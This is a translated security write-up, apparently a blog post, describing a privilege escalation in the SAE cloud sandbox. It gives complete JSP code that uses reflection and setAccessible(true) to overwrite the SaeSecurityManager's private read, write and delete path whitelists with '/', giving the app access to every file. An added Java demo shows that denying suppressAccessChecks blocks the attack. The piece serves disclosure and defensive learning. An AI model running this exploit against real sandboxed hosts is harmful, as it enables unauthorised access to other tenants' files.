SAE Cloud Service Security Sandbox Bypass 5 (forcibly modifying a class's private fields)

Source: Internet
Author: User

Summary
In the previous article, "SAE Cloud Service Security Sandbox Bypass 4 (bypassing the file permission defense)", the author mentioned an important class used for SAE's security checks, com.sina.sae.security.SaeSecurityManager, which provides several verification methods. This bypass targets that class.
Body
As mentioned in the previous article, a class that is to serve as the basis of the sandbox's security checks must extend java.lang.SecurityManager. In the current running environment, the installed SecurityManager object and its concrete class name can be obtained through the static method System.getSecurityManager(): if a security manager was installed (whether the default one or a custom one named by the java.security.manager command-line option), it is returned.
Test the sandbox environment
<%= System.getSecurityManager() %>
The page returns the class name and object address. It is indeed the class that raised the sandbox security error against us earlier. With that, we can write a code segment to inspect the fields of the class.
Let's take a look at the fields of this class:
<%@ page import="java.io.*, java.net.*, java.lang.reflect.*" %>
<%= System.getSecurityManager() %><br>
<%
ClassLoader cl = Thread.currentThread().getContextClassLoader();
try {
    // load the sandbox's security manager class by name
    Class c = cl.loadClass("com.sina.sae.security.SaeSecurityManager");
%><%= c.toString() %><%
    // getDeclaredFields() returns every field declared by the class, private ones included
    Field[] f = c.getDeclaredFields();
%><%= "----------------------------------" %><br><%
    for (int i = 0; i < f.length; i++) {
%><%= f[i].getType() + "|" + f[i].getName() %><br><%
    }
} catch (Exception e) {
%><%= e %><%
}
%>
This code traverses all fields declared by the class, private and public alike.
After the page is opened, the execution result is displayed. We can see the following field list:
String [] rwPath
String [] readPath
String [] deletePath
BAN_LIST_STARTSWITH
BAN_LIST_FULLNAME
The meaning of these fields can be guessed from their names:
String[] rwPath: a list of paths, probably the paths where file writes are allowed; if the guess is right, it is my web directory.
String[] readPath: a list of paths, probably the paths where file reads are allowed; if the guess is right, it is my web directory.
String[] deletePath: a list of paths, probably the paths where file deletion is allowed; if the guess is right, it is my web directory.
These fields are enough to explain the problem: SAE's code decides whether a file may be read, written or deleted based on these three path lists.
Elevation of Privilege
Can these fields be changed? If they are public, they can be set directly.
Let's try writing code to modify the paths:
<%@ page import="java.io.*, java.net.*, java.lang.reflect.*" %>
<%
SecurityManager security = System.getSecurityManager();
try {
    Class c = security.getClass();
%><%= c.toString() %><%
    Field[] f = c.getDeclaredFields();
    for (int i = 0; i < f.length; i++) {
%><%= f[i].getType() + "|" + f[i].getName() %><br><%
        try {
            // attempt to overwrite each field on the live security manager
            f[i].set(security, new String[] {"/"});
        } catch (Exception e) {
%><%= e %><%
        }
    }
%><%= "----------------------------------" %><br><%
    for (int i = 0; i < f.length; i++) {
%><%= f[i].getType() + "|" + f[i].getName() %><br><%
    }
} catch (Exception e) {
%><%= e %><%
}
%>
<%= security.toString() %>
The page displays the result. The important piece of information is:
java.lang.IllegalAccessException: Class org.apache.jsp.sm_jsp can not access a member of class com.sina.sae.security.SaeSecurityManager with modifiers "private"
class [Ljava.lang.String;|readPath
This error shows that a field with the "private" modifier cannot be accessed, so it cannot be changed directly. But this is not unsolvable: if the current sandbox policy grants the "suppressAccessChecks" reflection permission, calling
setAccessible(true)
on the Field forces access to private fields. Coincidentally, SAE does grant this permission. In the first bypass article I listed some of the granted permissions, and this one was among them.
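As an added example (not code from the article or from SAE), the following stand-alone Java program shows the permission gate just described from the sandbox's side: a hypothetical PathSandbox security manager with a private rwPath field is installed with and without ReflectPermission("suppressAccessChecks"), and a reflective overwrite mirroring the JSP succeeds only when that permission is granted.

```java
// Added example (not from the original article or SAE). Field.setAccessible(true)
// asks the installed SecurityManager for ReflectPermission("suppressAccessChecks");
// a sandbox that denies it stops the private-field overwrite. Runs on Java 8-17
// (on Java 18+ start with -Djava.security.manager=allow).
import java.lang.reflect.Field;
import java.lang.reflect.ReflectPermission;
import java.security.Permission;
import java.util.Arrays;

public class SuppressAccessChecksDemo {
    // Hypothetical stand-in for the sandbox's security manager, not SAE's class.
    static class PathSandbox extends SecurityManager {
        private String[] rwPath = {"/home/app/webroot"};  // mutable private state: the weak spot
        private final boolean allowSuppress;

        PathSandbox(boolean allowSuppress) { this.allowSuppress = allowSuppress; }

        @Override
        public void checkPermission(Permission p) {
            // Only the permission under discussion is gated; everything else is
            // allowed so the demo runs without a policy file.
            if (!allowSuppress && p instanceof ReflectPermission
                    && "suppressAccessChecks".equals(p.getName())) {
                throw new SecurityException("denied: " + p);
            }
        }
    }

    // Mirrors the article's JSP: reach into the manager's private rwPath and set it to "/".
    static String tryOverwrite(PathSandbox sm) {
        try {
            Field f = PathSandbox.class.getDeclaredField("rwPath");
            f.setAccessible(true);                 // this call is what the permission gates
            f.set(sm, new String[] {"/"});         // 'final' would not help: instance finals stay settable
            return "overwritten: " + Arrays.toString(sm.rwPath);
        } catch (SecurityException | ReflectiveOperationException e) {
            return "blocked: " + e;
        }
    }

    public static void main(String[] args) {
        for (boolean allow : new boolean[] {true, false}) {
            PathSandbox sm = new PathSandbox(allow);
            System.setSecurityManager(sm);   // install for the app, as the sandbox does
            System.out.println("suppressAccessChecks granted=" + allow + " -> " + tryOverwrite(sm));
            System.setSecurityManager(null); // permitted because checkPermission allows it
        }
    }
}
```

The second iteration fails at setAccessible(true) with a SecurityException, which is the outcome a sandbox policy that withholds suppressAccessChecks would have produced for the JSP above.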
Therefore, with a small change to the code, the fields can be forcibly modified:
<%@ page import="java.io.*, java.net.*, java.lang.reflect.*" %>
<%
SecurityManager security = System.getSecurityManager();
try {
    Class c = security.getClass();
%><%= c.toString() %><%
    Field[] f = c.getDeclaredFields();
    for (int i = 0; i < f.length; i++) {
        // requires ReflectPermission("suppressAccessChecks") under a security manager
        f[i].setAccessible(true);
%><%= f[i].getType() + "|" + f[i].getName() %><br><%
        try {
            f[i].set(security, new String[] {"/"});
        } catch (Exception e) {
%><%= e %><%
        }
    }
%><%= "----------------------------------" %><br><%
    for (int i = 0; i < f.length; i++) {
%><%= f[i].getType() + "|" + f[i].getName() %><br><%
    }
} catch (Exception e) {
%><%= e %><%
}
%>
<%= security.toString() %>
This works. I call this page the elevation-of-privilege page: as soon as it is accessed, the permissions of the current app are upgraded to allow access to all files.
First, let's look at the result of reading a file without the elevation of privilege: the file cannot be read.
Now open the elevation-of-privilege JSP. This time there is no error about a private field being unmodifiable. The subsequent error "Can not set static final java.util.Set field" is for BAN_LIST_STARTSWITH, whose type is not a String array; we do not intend to modify that field anyway, so it does not matter. What matters is that the whitelists of the three path lists governing the current app's read, write and delete access have been changed to "/", which means any file can be read, modified or deleted.
Next, visit the file-reading address again: at this point the permission restriction has been broken. This time I will not go and grab other users' images on the cloud; everyone knows what follows once this step is complete.
Summary
The author does not know what to summarize. After several bypasses it is clear that the developers' understanding of security is close to zero. Continuing in this way is meaningless; the author will only keep count, and unless a topic is worth writing about, will be too lazy to post.
In short, every permission in the permission list must be carefully considered before it is granted. For other summary points, see the previous article.